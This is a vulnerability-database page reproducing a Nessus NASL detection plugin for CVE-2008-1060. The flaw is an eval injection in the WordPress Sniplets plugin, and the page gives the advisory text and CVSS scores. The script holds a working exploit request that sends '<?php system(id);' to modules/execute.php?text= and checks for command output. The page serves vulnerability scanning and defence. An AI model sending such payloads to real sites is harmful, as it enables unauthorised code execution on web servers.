Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2008-2024 and is owned by Tenable, Inc. or an Affiliate thereof.SNIPLETS_TEXT_CMD_EXEC.NASL
HistoryFeb 26, 2008 - 12:00 a.m.

Sniplets Plugin for WordPress execute.php 'text' Parameter Arbitrary Command Execution

2008-02-2600:00:00
This script is Copyright (C) 2008-2024 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
36

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7 High

AI Score

Confidence

High

0.013 Low

EPSS

Percentile

85.7%

JSON

The remote host is running Sniplets, a third-party text insertion plugin for WordPress.

The version of Sniplets installed on the remote host passes user input to the ‘text’ parameter of the ‘modules/execute.php’ script before passing it to an ‘eval()’ statement. Provided that PHP’s ‘register_globals’ setting is enabled, an unauthenticated remote attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges of the web server user id.

Note that the Sniplets plugin is also reportedly affected by cross-site scripting and remote file inclusion vulnerabilities;
however, Nessus has not tested for these.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(31167);
  script_version("1.24");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");

  script_cve_id("CVE-2008-1060");
  script_bugtraq_id(27985);
  script_xref(name:"EDB-ID", value:"5194");
  script_xref(name:"Secunia", value:"29099");

  script_name(english:"Sniplets Plugin for WordPress execute.php 'text' Parameter Arbitrary Command Execution");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows arbitrary
command execution.");
  script_set_attribute(attribute:"description", value:
"The remote host is running Sniplets, a third-party text insertion
plugin for WordPress.

The version of Sniplets installed on the remote host passes user input
to the 'text' parameter of the 'modules/execute.php' script before
passing it to an 'eval()' statement. Provided that PHP's
'register_globals' setting is enabled, an unauthenticated remote
attacker can leverage this issue to execute arbitrary code on the
remote host subject to the privileges of the web server user id.

Note that the Sniplets plugin is also reportedly affected by
cross-site scripting and remote file inclusion vulnerabilities;
however, Nessus has not tested for these.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/488734");
  script_set_attribute(attribute:"see_also", value:"https://wordpress.org/plugins/sniplets/#changelog");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 1.2.3 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");
  script_cwe_id(94);

  script_set_attribute(attribute:"vuln_publication_date", value:"2008/02/25");
  script_set_attribute(attribute:"patch_publication_date", value:"2008/02/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2008/02/26");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:sniplets_plugin");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");
include("data_protection.inc");

app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

plugin = "Sniplets";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  checks = make_array();
  path = "/wp-content/plugins/";
  checks[path + "sniplets/resource/admin.js"][0] =
    make_list('function setupSniplets');

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}
if (!installed)
  audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");

# Try to exploit the flaw to run a command.
cmd = "id";
exploit = "<?php system(" +cmd+ ");";

w = http_send_recv3(
  method:"GET",
  item: dir + "/wp-content/plugins/sniplets/modules/execute.php?text=" +
    urlencode(str:exploit),
  port:port,
  exit_on_fail:TRUE
);
res = w[2];

# There's a problem if...
if (
  # the output looks like it's from id or...
  egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res) ||
  # PHP's disable_functions prevents running system().
  egrep(pattern:"Warning.+ has been disabled for security reasons", string:res)
)
{
if (
  report_verbosity > 0 &&
  egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res)
)
{
  report =
    '\n' +
    'Nessus was able to execute the command "' +  cmd + '" on the remote\n' +
    'host to produce the following results :\n' +
    '\n' +
    "  " + data_protection::sanitize_uid(output:egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res));
    security_warning(port:port, extra:report);
  }
  else security_warning(port);
  exit(0);
}
audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " plugin");
VendorProductVersionCPE
wordpresswordpresscpe:/a:wordpress:wordpress
wordpresssniplets_plugincpe:/a:wordpress:sniplets_plugin

Related

patchstack 1
prion 1
cve 1
canvas 1
cvelist 1
nvd 1
wpvulndb 1
patchstack
patchstack
WordPress Sniplets Plugin <= 1.2.2 - Eval Injection
2008-02-28 00:00:00
prion
prion
Sql injection
2008-02-28 19:44:00
cve
cve
CVE-2008-1060
2008-02-28 19:44:00
canvas
canvas
Immunity Canvas: WPSNIPLETS_EXEC
2008-02-28 19:44:00
cvelist
cvelist
CVE-2008-1060
2008-02-28 19:00:00
nvd
nvd
CVE-2008-1060
2008-02-28 19:44:00
wpvulndb
wpvulndb
Sniplets 1.1.2 - (RFI/XSS/RCE) Multiple Vulnerabilities
2014-08-01 00:00:00

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7 High

AI Score

Confidence

High

0.013 Low

EPSS

Percentile

85.7%

JSON
Related for SNIPLETS_TEXT_CMD_EXEC.NASL
patchstack1prion1cve1canvas1cvelist1nvd1wpvulndb1